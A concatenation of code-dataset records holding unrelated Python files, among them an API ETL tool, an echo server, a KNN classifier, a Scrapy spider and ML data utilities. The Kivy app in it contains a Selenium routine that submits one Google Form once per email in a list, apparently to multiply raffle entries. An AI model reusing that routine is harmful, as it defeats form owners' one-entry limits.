db.pg_tables import officerlist_tables, appointmentlist_tables\nfrom utils.json_getter import Getter\nfrom utils.json_inserter import Inserter\nfrom utils.json_params import psc_params, companyprofile_params\nfrom utils.json_params import officerlist_params, appointmentlist_params\nfrom utils.cli import parser\nfrom utils.cli import file_is_csv_or_txt, optional_flags_collide, data_wont_fit_excel\nfrom utils.cli import file_contains_company_codes, url_ids_examples\nfrom utils.helpers import read_file_with_url_ids\n\n\n# cli arguments constants\nARGS = parser.parse_args()\n\nARGS_PARAMS = {'al' : {\"params\" : appointmentlist_params,\n \"create_stmts\": appointmentlist_tables,\n \"all_tables\" : [\"appointmentlist\",\n \"al_items\",\n \"al_items_address\",\n \"al_items_identification\",\n \"al_items_name_elements\",\n \"al_items_former_names\"]},\n 'ol' : {\"params\" : officerlist_params,\n \"create_stmts\": officerlist_tables,\n \"all_tables\" : [\"officerlist_http_errors\",\n \"officerlist_empty\",\n \"ol_items\",\n \"ol_items_address\",\n \"ol_items_identification\",\n \"ol_items_former_names\"]},\n 'psc': {\"params\" : psc_params,\n \"create_stmts\": psc_tables,\n \"all_tables\" : [\"psc_items\",\n \"psc_items_name_elements\",\n \"psc_items_identification\",\n \"psc_items_address\",\n \"psc_http_errors\",\n \"psc_items_natures_of_control\"]},\n 'cp' : {\"params\" : companyprofile_params,\n \"create_stmts\": companyprofile_tables,\n \"all_tables\" : [\"companyprofile\",\n \"cp_registered_office_address\",\n \"companyprofile_http_errors\",\n \"cp_sic_codes\",\n \"cp_previous_company_names\"]}}\n\nSELECT_ALL = \"select * from {};\"\n\n\n# supporting functions for main()\ndef make_url_list(args):\n \"\"\"\n given a file url runs checks for illegal cases and extracts the serializes content of the file to an iterable.\n \"\"\"\n\n if not file_is_csv_or_txt(args):\n raise ValueError(\"The file where you store the url_ids has to be in csv format.\")\n\n else:\n url_ids = read_file_with_url_ids(path=args.file)\n\n if data_wont_fit_excel(args, url_ids):\n raise ValueError(\"You won't be able to dump more than 1,048,576 rows in an excel file. \\n\"\n \"Please reduce the number of url_ids to be queried in the csv file containing them.\")\n\n return url_ids\n\n\ndef run_flags_check(args, url_ids):\n \"\"\"\n runs checks for all illegal cases when using the flags with prog.py\n \"\"\"\n\n if optional_flags_collide(args):\n raise ValueError(\"When passing the --al flag, other flags are automatically deactivated.\\n\"\n \"The url for the appointmentslist resource is different from the url required by\"\n \" psc, cp and ol.\\n\\n\" + url_ids_examples)\n\n if args.al is True and file_contains_company_codes(url_ids):\n\n raise ValueError(\"It looks lik you have provided a file containing company codes with the --al flag.\\n\"\n \"Company codes can only be used for --psc --ol and --cp flags.\\n\\n\"\n + url_ids_examples\n + \"Here's the list of url that were read (and cleaned) from the file.\\n\"\n + \" \\n\".join(url_ids[:5] if len(url_ids) > 5 else url_ids))\n\n if (args.psc is True or args.cp is True or args.ol is True) and not file_contains_company_codes(url_ids):\n\n raise ValueError(\"It looks lik you have provided a file which does not contain company codes.\\n\"\n \"Company codes are required for the --psc --ol and --cp flags.\\n\\n\"\n + url_ids_examples\n + \"Here's the list of url that were read (and cleaned) from the file.\\n\\n\"\n + \" \\n\".join(url_ids[:5] if len(url_ids) > 5 else url_ids))\n return None\n\n\ndef dump_to_excel(args, args_params, query, conn):\n \"\"\"\n iteratively apply SELECT * FROM {table} and creates Excel files, one table per Excel sheet.\n \"\"\"\n\n if args.excel is True:\n\n # build list of dictionaries {json flag: list of table names}.\n # all_tables_dicts = [{\"cp\" : [\"companyprofile\", \"cp_sic_codes\", ...]},\n # {\"ol\" : [\"ol_items\", \"ol_items_address\", ...]}, ...]\n all_tables_dicts = [{key: dict_[\"all_tables\"]} for key, dict_ in args_params.items() if vars(args)[key]]\n\n # What we are building to do with comprehension => df_name.to_excel(writer, sheet_name='some_table_name')\n for table_dict in all_tables_dicts:\n\n # build dictionary of dataframes read from pg.\n # {\"cp\" : [{\"companyprofile\": df}, {\"cp_sic_codes\": df},...]}\n df_hash = {k: [{table: pd.read_sql_query(query.format(table), conn) for table in v}]\n for k, v in table_dict.items()}\n\n # create list of writer instances.\n writers = [pd.ExcelWriter(DB_SCHEMA + '_' + k + '.xlsx', engine='xlsxwriter')\n for k, _ in df_hash.items()]\n\n # write to excel file.\n for writer, (k, v) in zip(writers, df_hash.items()):\n for dic in v:\n for tab, df in dic.items():\n df.to_excel(writer, sheet_name=tab)\n\n # Close the Pandas Excel writer and output the Excel file.\n writer.save()\n return\n\n\ndef main(args, args_params):\n\n # get url_ids from file and check flags passed by user.\n url_ids = make_url_list(args)\n run_flags_check(args, url_ids=url_ids)\n\n # create engine instance\n engine = MyDb(db_config_file=DB_CONFIG_ABS_PATH, db_section_name=DB_CONFIG_SECTION, schema=DB_SCHEMA)\n connection = engine.connect()\n\n # create list of create statements\n create_stmts = [dict_[\"create_stmts\"] for key, dict_ in args_params.items() if vars(args)[key]]\n\n # execute create statement\n _ = list(map(lambda x: engine.execute(mode=\"write\", query=x), create_stmts))\n\n # create list of params dictionaries.\n params = [dict_[\"params\"] for key, dict_ in args_params.items() if vars(args)[key]]\n\n # for al flag.\n if args.al:\n\n for appointmentlist_id in url_ids:\n extractor = Getter(appointmentlist_params, appointmentlist_id)\n json, _, _ = extractor.extract()\n inserter = Inserter(json=json, params=appointmentlist_params)\n inserter.unpack(uid_value=appointmentlist_id)\n\n # for all other flags (psc, ol, cp).\n if args.ol or args.psc or args.cp:\n\n for company_number in url_ids:\n for params_dict in params:\n extractor = Getter(json_params=params_dict, url_id=company_number)\n json, _, _ = extractor.extract()\n inserter = Inserter(json=json, params=params_dict)\n inserter.unpack(uid_value=company_number)\n\n if args.excel is True:\n dump_to_excel(args=ARGS, args_params=ARGS_PARAMS, query=SELECT_ALL, conn=connection)\n\nif __name__ == '__main__':\n\n main(args=ARGS, args_params=ARGS_PARAMS)\n","sub_path":"ch_api/prog.py","file_name":"prog.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"400716277","text":"from kivy.lang import Builder\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.properties import StringProperty\nfrom kivy.properties import ObjectProperty\nfrom kivymd.app import MDApp\nfrom kivy.uix.screenmanager import Screen\nfrom kivymd.theming import ThemableBehavior\nfrom kivy.core.audio import SoundLoader\nfrom kivymd.uix.list import OneLineIconListItem, MDList\nfrom kivy.utils import get_color_from_hex\nfrom kivymd.theming import colors\nimport requests\nimport json\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.proxy import Proxy\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.chrome.options import Options\nimport zipfile,os\nfrom kivy.uix.behaviors import ButtonBehavior\nfrom kivy.uix.image import Image\n\nclass ImageButton(ButtonBehavior, Image):\n pass\n\nKV = ''\nclass ContentNavigationDrawer(BoxLayout):\n userList =[]\n email = ObjectProperty(None)\n input_Fname =ObjectProperty(None)\n input_Lname=ObjectProperty(None)\n input_Street=ObjectProperty(None)\n input_City=ObjectProperty(None)\n input_State=ObjectProperty(None)\n input_Zip=ObjectProperty(None)\n webhook1 = ObjectProperty(None)\n def save_info(self):\n Fname = self.input_Fname.text\n Lname = self.input_Lname.text\n Street = self.input_Street.text\n City = self.input_City.text\n State = self.input_State.text\n Zip = self.input_Zip.text\n\n print(Fname,Lname,Street,City,State,Zip)\n\n def webhook(self):\n userWebhook = self.webhook1.text\n\n print(userWebhook)\n return userWebhook\n \n def webhookTest(self):\n\n self.url = self.webhook()# webhook url\n\n self.data = {}\n # for all params, see https://discordapp.com/developers/docs/resources/webhook#execute-webhook\n self.data[\"content\"] = \"Those who do not understand true pain can never understand true peace.\"\n self.data[\"username\"] = \"PAIN\"\n\n self.result = requests.post(self.url, data=json.dumps(self.data), headers={\"Content-Type\": \"application/json\"})\n\n try:\n self.result.raise_for_status()\n except requests.exceptions.HTTPError as err:\n print(err)\n else:\n print(\"Payload delivered successfully, code {}.\".format(self.result.status_code))\n\n\n\n\n\n def btn(self):\n text = self.email.text\n userList=text.split()\n self.email.text = \"\"\n print(userList)\n xPath_Email = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/div[1]/div/div[1]/input'\n xPath_Fname = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[2]/div/div/div[2]/div/div[1]/div/div[1]/input'\n xPath_Lname = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[3]/div/div/div[2]/div/div[1]/div/div[1]/input'\n xPath_Street = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[4]/div/div/div[2]/div/div[1]/div/div[1]/input'\n xPath_City = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[5]/div/div/div[2]/div/div[1]/div/div[1]/input'\n xPath_State = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[6]/div/div/div[2]/div/div[1]/div/div[1]/input'\n xPath_Zip = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[7]/div/div/div[2]/div/div[1]/div/div[1]/input'\n xPath_Size = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[2]/div[8]/div/div/div[2]/div/div/span/div/div[8]/label/div/div[1]/div'\n xPath_Submit = '//*[@id=\"mG61Hd\"]/div[2]/div[1]/div[3]/div[3]/div[1]/div'\n for email in userList:\n driver = webdriver.Chrome(executable_path='/Users/manuelpartida/Desktop/chromedriver')\n time.sleep(1)\n driver.get(str(\n \"https://docs.google.com/forms/d/e/1FAIpQLSeHfR7uI1tREQR_b2Hc-aNAb2_e377kgsqZXBcTYPfr4l_Z9w/viewform?embedded=true\"))\n time.sleep(3)\n driver.find_element_by_xpath(xPath_Email).send_keys(email)\n time.sleep(3)\n driver.find_element_by_xpath(xPath_Fname).send_keys(Fname)\n time.sleep(3)\n driver.find_element_by_xpath(xPath_Lname).send_keys(Lname)\n time.sleep(3)\n driver.find_element_by_xpath(xPath_Street).send_keys(Street)\n time.sleep(3)\n driver.find_element_by_xpath(xPath_City).send_keys(City)\n time.sleep(3)\n driver.find_element_by_xpath(xPath_State).send_keys(State)\n time.sleep(3)\n driver.find_element_by_xpath(xPath_Zip).send_keys(Zip)\n time.sleep(3)\n driver.find_element_by_xpath(xPath_Size).click()\n time.sleep(3)\n driver.find_element_by_xpath(xPath_Submit).click()\n time.sleep(30)\n print(\"All Done with \" + str(email) + \"!\")\n\n # self.submit(userList)\n pass\n\n\n #self.submit(userList)\n pass\nclass ItemDrawer(OneLineIconListItem):\n icon = StringProperty()\n\n\nclass DrawerList(ThemableBehavior, MDList):\n def set_color_item(self, instance_item):\n \"\"\"Called when tap on a menu item.\"\"\"\n\n # Set the color of the icon and text for the menu item.\n for item in self.children:\n if item.text_color == self.theme_cls.primary_color:\n item.text_color = self.theme_cls.text_color\n break\n instance_item.text_color = self.theme_cls.primary_color\n\n\nclass MainApp(MDApp, ContentNavigationDrawer):\n def build(self):\n self.theme_cls.primary_palette = 'LightGreen'\n self.theme_cls.theme_style = \"Dark\"\n return Builder.load_string(KV)\n\n def play_sound(self):\n self.sound = SoundLoader.load('Fallout V.A.T.S. sound effect.wav')\n self.sound.play()\n\n\n\n\n\n\n\nMainApp().run()","sub_path":"kivyGUIwithWebhook/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"283173202","text":"__author__ = 'kathiria'\r\n\r\n# server.py\r\n\r\nfrom socket import *\r\nfrom select import select\r\nfrom collections import deque\r\n\r\ntasks = deque()\r\nrecv_wait = {} # sock -> task\r\nsend_wait = {} # sock -> task\r\n\r\ndef run():\r\n while any([tasks, recv_wait, send_wait]):\r\n while not tasks:\r\n can_recv, can_send, _ = select(recv_wait, send_wait, [])\r\n for s in can_recv:\r\n tasks.append(recv_wait.pop(s))\r\n for s in can_send:\r\n tasks.append(send_wait.pop(s))\r\n task = tasks.popleft()\r\n try:\r\n reason, resource = next(task)\r\n if reason == 'recv':\r\n recv_wait[resource] = task\r\n elif reason == 'send':\r\n send_wait[resource] = task\r\n else:\r\n raise RuntimeError('Unknown reason %r' % reason)\r\n except StopIteration:\r\n print('Task done')\r\n\r\ndef tcp_server(address, handler):\r\n sock = socket(AF_INET, SOCK_STREAM)\r\n sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\r\n sock.bind(address)\r\n sock.listen(5)\r\n while True:\r\n yield 'recv', sock\r\n client, addr = sock.accept()\r\n tasks.append(handler(client, addr))\r\n\r\ndef echo_handler(client, address):\r\n print('Connection from', address)\r\n while True:\r\n yield 'recv', client\r\n data = client.recv(1000)\r\n if not data:\r\n break\r\n yield 'send', client\r\n client.send(b'GOT:' + data)\r\n print('Connection closed')\r\n\r\nif __name__ == '__main__':\r\n tasks.append(tcp_server(('',25000), echo_handler))\r\n run()\r\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"184868841","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/lbusoni/git/palpao/test/calibration/in_memory_calibration_manager_test.py\n# Compiled at: 2018-10-06 05:15:43\n# Size of source mod 2**32: 997 bytes\nimport unittest, numpy as np\nfrom palpao.calibration.in_memory_calibration_manager import InMemoryCalibrationManager\nfrom palpao.types.modal_basis import ModalBasis\n\nclass InMemoryCalibrationManagerTest(unittest.TestCase):\n\n def setUp(self):\n self.calibMgr = InMemoryCalibrationManager()\n\n def testModalBasisStorage(self):\n tag = '20140909_110800'\n originalObject = ModalBasis(np.arange(8).reshape((4, 2)))\n self.calibMgr.saveModalBasis(tag, originalObject)\n storedObject = self.calibMgr.loadModalBasis(tag)\n self.assertEqual(storedObject, originalObject)\n\n def testZonalCommandStorage(self):\n tag = '20181222_110000'\n originalObject = np.arange(8)\n self.calibMgr.saveZonalCommand(tag, originalObject)\n storedObject = self.calibMgr.loadZonalCommand(tag)\n self.assertTrue(np.array_equal(storedObject, originalObject))\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"pycfiles/palpao-0.16.0.tar/in_memory_calibration_manager_test.cpython-36.py","file_name":"in_memory_calibration_manager_test.cpython-36.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"471896438","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n pip_services_echo.build.EchoFactory\r\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n Echo factory implementation\r\n \r\n :copyright: Digital Living Software Corp. 2015-2016, see AUTHORS for more details.\r\n :license: MIT, see LICENSE for more details.\r\n\"\"\"\r\n\r\nfrom pip_services_commons.build import IFactory\r\nfrom pip_services_commons.refer import Descriptor, IDescriptable\r\n\r\nfrom ..logic.EchoController import EchoControllerDescriptor, EchoController\r\nfrom ..clients.version1.EchoDirectClient import EchoDirectClientDescriptor, EchoDirectClient\r\nfrom ..clients.version1.EchoRestClient import EchoRestClientDescriptor, EchoRestClient\r\nfrom ..services.version1.EchoRestService import EchoRestServiceDescriptor, EchoRestService\r\n\r\nEchoFactoryDescriptor = Descriptor(\"pip-services-echo\", \"factory\", \"default\", \"1.0\")\r\n\r\nclass EchoFactory(object, IFactory, IDescriptable):\r\n\r\n def get_descriptor(self):\r\n return EchoFactoryDescriptor\r\n\r\n def can_create(self, locator):\r\n if isinstance(locator, Descriptor):\r\n if locator.match(EchoControllerDescriptor):\r\n return True\r\n if locator.match(EchoDirectClientDescriptor):\r\n return True\r\n if locator.match(EchoRestClientDescriptor):\r\n return True\r\n if locator.match(EchoRestServiceDescriptor):\r\n return True\r\n \r\n return False\r\n\r\n def create(self, locator):\r\n if isinstance(locator, Descriptor):\r\n if locator.match(EchoControllerDescriptor):\r\n return EchoController()\r\n if locator.match(EchoDirectClientDescriptor):\r\n return EchoDirectClient()\r\n if locator.match(EchoRestClientDescriptor):\r\n return EchoRestClient()\r\n if locator.match(EchoRestServiceDescriptor):\r\n return EchoRestService()\r\n \r\n return None\r\n","sub_path":"pip_services_echo/build/EchoFactory.py","file_name":"EchoFactory.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"295395493","text":"#coding=utf-8\n'''\nCreated on 5 Apr 2019\n@author: pr4shan7 (प्रशांत)\n'''\n#https://projecteuler.net/thread=30#475\nimport math\nfsum = 0\nfor i in range (2, 354294):\n sum = 0\n for j in str (i):\n sum += math. pow (int (j), 5)\n if (sum == i):\n fsum += i\n print (i)\nprint (\"yo --> \" + str(fsum))\n","sub_path":"ProjectEuler/30.py","file_name":"30.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"66204042","text":"###############################################################################\n# ALGORITHM: Binary Search without recursion\n###############################################################################\n# Input: an array \"arr\"\n# a starting index \"low\"\n# an ending index \"high\"\n# a value to be searched \"key\"\n# Output: return -1 if key does not exist\n# return index of the key found in the array\n#\n# Example:\n#\n# INPUT:\n# arr = [3, 2, 9, 8, 5, 6, 0]\n# low = 1\n# high = 5\n# key = 8\n#\n# OUTPUT:\n# 3 (because arr[3] == 8)\n\ndef binarySearch(arr, low, high, key):\n # create a stack to mimic recursive strategy\n stack = []\n\n # push initial values\n stack.append(low)\n stack.append(high)\n\n while stack != []: # while stack is not empty\n high = stack.pop()\n low = stack.pop()\n mid = int((low + high) / 2)\n\n if arr[mid] == key:\n return mid\n\n # if target < mid node then we travel to left tree\n if key < arr[mid] and mid > low:\n # push lower index in first\n stack.append(low)\n # so higher index is always higher\n stack.append(mid - 1)\n\n # if target > mid node then we travel to right tree\n elif key > arr[mid] and high > mid:\n # push lower index in first\n stack.append(mid + 1)\n # so higher index is always higher\n stack.append(high)\n\n # if algorithm does not return within the loop then key does not exist\n return -1\n# END ALGORITHM\n###############################################################################\n\narr = [1, 2, 3, 4, 5, 6]\nprint(binarySearch(arr, 0, 5, 1))\nprint(binarySearch(arr, 0, 5, 10))\n","sub_path":"LeetCode/Library/lib_search.py","file_name":"lib_search.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"220805317","text":"\"\"\"\n\tАвтор: Гришутенко Павел, группа№1, подгруппа№2\n\tРабота с исключениями\n\tВвод данных из json ввиде таблицы с обработкой исключительных ситуаций\n\t\n\tВвод данных из json парами ключ - значение с использованием\n импортируемого модуля json с применением обработки исключений\n\"\"\"\ntry:\n import json\nexcept ImportError:\n print(\"Ошибка при попытке импартировать модуль\")\n\ndef openFile(name):\n try:\n with open(name, \"r\") as read_file:\n try:\n data = json.load(read_file)\n except json.JSONDecodeError:\n print(\"не json\")\n \n return data\n \n except FileNotFoundError:\n print(\"не найден файл, проверте указанный путь к файлу\")\n return -2\n except IOError:\n print(\"невозможно прочитать/записать. (возможна ошибка прав доступа)\")\n return -3\n \n return -1\n\n\ndef printTable(data):\n table = ''\n try:\n for element in data:\n for item in element:\n try:\n print(item,' : ',element.get(item))\n table = table + str(item) \\\n + ' : ' + str(element.get(item)) + ' '\n except KeyError:\n print('Неверное взятие по ключу')\n \n return table\n \n except IndexError:\n print('Неверное итерирование по объекту')\n except:\n return -1\n\ndef readAndPrintTable(file_name):\n \n data = openFile(file_name)\n printTable(data)\n\n \n\nif __name__ == \"__main__\":\n readAndPrintTable(\"file.json\")\n\n","sub_path":"Grishutenko_lab_5_1.py","file_name":"Grishutenko_lab_5_1.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"559938707","text":"import numpy as np\nfrom sortedcontainers import SortedList\n\nfrom util import get_data\nfrom datetime import datetime\n\n\nclass KNN(object):\n def __init__(self, k):\n self.k = k\n\n def fit(self, X, y):\n self.X = X\n self.y = y\n\n def preditc(self, X):\n y = np.zeros(len(X))\n for i, x in enumerate(X):\n sl = SortedList()\n for j, xt in enumerate(self.X):\n diff = x - xt\n d = diff.dot(diff) # squared distance\n if len(sl) < self.k:\n sl.add((d, self.y[j]))\n else:\n if d < sl[-1][0]:\n del sl[-1]\n sl.add((d, self.y[j]))\n\n votes = {} # dicts for votes to which class the point belongs\n for _, v in sl:\n votes[v] = votes.get(v, 0) + 1 # we flip the votes\n max_votes = 0\n max_votes_class = -1\n for v, count in dict.items(votes):\n if count > max_votes:\n max_votes = count\n max_votes_class = v\n\n y[i] = max_votes_class\n return y\n\n def score(self, X, Y):\n P = self.preditc(X)\n return np.mean(P == Y)\n\n\nif __name__ == '__main__':\n X, Y = get_data(2000)\n Ntrain = 1000\n Xtrain, Ytrain = X[: Ntrain], Y[:Ntrain]\n Xtest, Ytest = X[Ntrain:], Y[:Ntrain:]\n for k in (1, 2, 3, 4, 5):\n knn = KNN(k)\n t0 = datetime.now()\n knn.fit(Xtrain, Ytrain)\n print(\"traning time:\", (datetime.now() - t0))\n\n t0 = datetime.now()\n print(\"train accuracy:\", knn.score(Xtrain, Ytrain))\n print(\"Time to compute train accuracy:\", (datetime.now() - t0), \"Train size:\", len(Ytrain))\n\n print(\"test accuracy:\", knn.score(Xtrain, Ytrain))\n print(\"Time to compute test accuracy:\", (datetime.now() - t0), \"Test size:\", len(Ytest))\n","sub_path":"supervised_class/myknn.py","file_name":"myknn.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"357114222","text":"#!/usr/bin/env python3\n#\n# Copyright 2021 Graviti. Licensed under MIT License.\n#\n\n# pylint: disable=pointless-string-statement\n# pylint: disable=wrong-import-position\n# pylint: disable=import-error\n# type: ignore\n\n\"\"\"This is the example code for using dataset in Pytorch.\"\"\"\n\n\n\"\"\"Build a Segment class\"\"\"\nfrom PIL import Image\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision import transforms\n\nfrom tensorbay import GAS\nfrom tensorbay.dataset import Dataset as TensorBayDataset\n\n\nclass MNISTSegment(Dataset):\n \"\"\"class for wrapping a MNIST segment.\"\"\"\n\n def __init__(self, gas, segment_name, transform):\n super().__init__()\n self.dataset = TensorBayDataset(\"MNIST\", gas)\n self.segment = self.dataset[segment_name]\n self.category_to_index = self.dataset.catalog.classification.get_category_to_index()\n self.transform = transform\n\n def __len__(self):\n return len(self.segment)\n\n def __getitem__(self, idx):\n data = self.segment[idx]\n with data.open() as fp:\n image_tensor = self.transform(Image.open(fp))\n\n return image_tensor, self.category_to_index[data.label.classification.category]\n # \"\"\"\"\"\"\n\n\n\"\"\"Build a dataloader and run it\"\"\"\nACCESS_KEY = \"Accesskey-*****\"\n\nto_tensor = transforms.ToTensor()\nnormalization = transforms.Normalize(mean=[0.485], std=[0.229])\nmy_transforms = transforms.Compose([to_tensor, normalization])\n\ntrain_segment = MNISTSegment(GAS(ACCESS_KEY), segment_name=\"train\", transform=my_transforms)\ntrain_dataloader = DataLoader(train_segment, batch_size=4, shuffle=True, num_workers=4)\n\nfor index, (image, label) in enumerate(train_dataloader):\n print(f\"{index}: {label}\")\n\"\"\"\"\"\"\n","sub_path":"docs/code/use_dataset_in_pytorch.py","file_name":"use_dataset_in_pytorch.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"33051489","text":"import numpy as np\nimport pandas as pd\nfrom math import ceil\n\n\nclass DataManager(object):\n def __init__(self, X, Y, mask_evaluate=None,\n mask_na=None, ids=None, batch_size=None,\n seq_length=None, hidden_units=None):\n self.data = {'X': X, 'Y': Y, 'mask_evaluate': mask_evaluate,\n 'mask_na': mask_na, 'ids': ids}\n self.X = X\n self.Y = Y\n self.batch_size = batch_size\n self.seq_length = seq_length\n self.mask_evaluate = mask_evaluate\n self.mask_na = mask_na\n self.hidden_units = hidden_units\n\n def get_num_features(self):\n return self.X.shape[2]\n '''\n def get_seq_length(self):\n return self.X.shape[1]-48\n '''\n def get_num_targets(self):\n if not len(self.Y.shape) > 2:\n return 1\n\n return self.Y.shape[2]\n\n def get_num_batches(self, batch_size):\n return int(ceil(self.data['X'].shape[0] / batch_size))\n\n def get_batch(self, batch, batch_size):\n batch_list = list()\n for data in [self.X, self.Y, self.mask_evaluate, self.mask_na]:\n if data is None:\n batch_list.append(data)\n else:\n start_idx = batch * batch_size\n end_idx = start_idx + batch_size\n batch_data = data[start_idx:end_idx]\n assert not np.any(np.isnan(batch_data))\n batch_list.append(batch_data)\n\n return batch_list\n\n def get_sequences(self, data, seq_num):\n data_list = list()\n for elem in data:\n s_ix = (self.seq_length+48)*seq_num\n e_ix = (self.seq_length+48)*(seq_num+1)\n data_list.append(elem[:, s_ix:e_ix, :])\n\n return data_list\n\n def get_num_sequences(self, seq_length):\n return ceil(self.X.shape[1]/(seq_length+48))\n\n def store_state(self, state):\n self.current_state, self.hidden_state = state\n\n def get_last_state(self):\n return self.current_state, self.hidden_state\n\n def get_empty_state(self):\n return [np.zeros((self.batch_size, self.hidden_units))] * 2\n\n def format_outputs(self, predictions_train, predictions_eval):\n predictions_train = predictions_train.reshape(\n self.batch_size, -1, self.get_num_features())\n predictions = np.concatenate((predictions_eval, predictions_train),\n axis=1)\n return predictions\n\n def create_estimates_dict(self, preds, targets):\n preds = pd.DataFrame(np.hstack(\n [preds.reshape([-1, self.get_num_targets()]),\n self.data['ids'].reshape([-1, 1]),\n self.data['mask_evaluate'][:, :, 0].reshape([-1, 1])]))\n targets = pd.DataFrame(np.hstack(\n [targets.reshape([-1, self.get_num_targets()]),\n self.data['ids'].reshape([-1, 1]),\n self.data['mask_evaluate'][:, :, 0].reshape([-1, 1])]))\n col_dict = {col: 'p'+str(col) for col in preds.columns[:6]}\n col_dict[6] = 'station'\n col_dict[7] = 'train'\n preds = preds.rename(columns=col_dict)\n targets = targets.rename(columns=col_dict)\n estimates_dict = {\n 'predictions': preds,\n 'targets': targets,\n }\n return estimates_dict\n\n","sub_path":"src/models/nn/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"435351592","text":"import string\nfrom scrapy import Request\nfrom scrapy import Spider\nfrom avia.items import AviaItem\nimport datetime\nimport re\n\n\nclass ToScrapeCSSSpider(Spider):\n name = \"asn\"\n\n base_url = 'https://aviation-safety.net/'\n start_urls = [\n 'https://aviation-safety.net/database/dblist.php?Year=2018',\n ]\n\n\n def parse(self, response):\n curr_page = None\n next_page = None\n curr_page = response.xpath('//div[@class=\"pagenumbers\"]/span[@class=\"current\"]/text()').extract_first()\n if curr_page is not None:\n next_page = response.xpath(\n '//div[@class=\"pagenumbers\"]//a[' + curr_page + ']/@href').extract_first()\n for href in response.xpath('//td[@class=\"list\"]/nobr/a'):\n request = response.follow(href, self.parse_avia)\n yield request\n if curr_page is not None and next_page is not None:\n yield Request(response.urljoin(next_page), self.parse)\n\n def parse_avia(self, response):\n print(response.url)\n asn_date = response.xpath('//tr/td[text()=\"Date:\"]/following::td[1]/text()').extract_first()\n asn_time = response.xpath('//tr/td[text()=\"Time:\"]/following::td[1]/text()').extract_first()\n asn_type = response.xpath('//tr/td[text()=\"Type:\"]/following::td[1]//a/text()').extract_first()\n asn_registration = response.xpath('//tr/td[text()=\"Registration:\"]/following::td[1]/text()').extract_first()\n asn_fatalities = response.xpath('//tr/td[text()=\"Total:\"]/following::td[1]/text()').extract_first()\n asn_location = ''.join(response.xpath('//tr/td[text()=\"Location:\"]/following::td[1]//text()').extract())\n\n\n locationclear = re.sub(\"^\\s+|\\n|\\r|\\s+$\", '', asn_location)\n #''.join(list(filter(lambda x: x in string.printable, asn_location)))\n\n weekday, day, monthclear, year = asn_date.split(' ')\n\n for old, new in [('January', '1'), ('February', '2'), ('March', '3'), ('April', '4'), ('May', '5'),\n ('June', '6'),\n ('July', '7'), ('August', '8'), ('September', '9'), ('October', '10'), ('November', '11'),\n ('December', '12')]:\n monthclear = monthclear.replace(old, new)\n\n if asn_time is not None:\n timeclear = ''.join(\n list(filter(lambda x: x if x in [':', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9'] else '',\n asn_time)))\n else:\n timeclear = '00:00'\n\n hour, min = timeclear.split(':')\n datetimeclear = datetime.datetime(int(year), int(monthclear), int(day), int(hour), int(min))\n\n item = AviaItem()\n item['asn_datetime'] = str(datetimeclear)\n item['asn_type'] = asn_type\n item['asn_registration'] = asn_registration\n item['asn_fatalities'] = asn_fatalities[asn_fatalities.find(':') + 1:asn_fatalities.rfind('/')]\n item['asn_location'] = locationclear\n\n\n yield item\n","sub_path":"avia/spiders/asn.py","file_name":"asn.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"25094519","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nfrom easydict import EasyDict as edict\nimport time\nimport sys\nimport numpy as np\nimport argparse\nimport struct\nimport cv2\nimport sklearn\nfrom sklearn.preprocessing import normalize\nimport mxnet as mx\nfrom mxnet import ndarray as nd\nimport ipdb\n\n\ndef read_img(image_path):\n img = 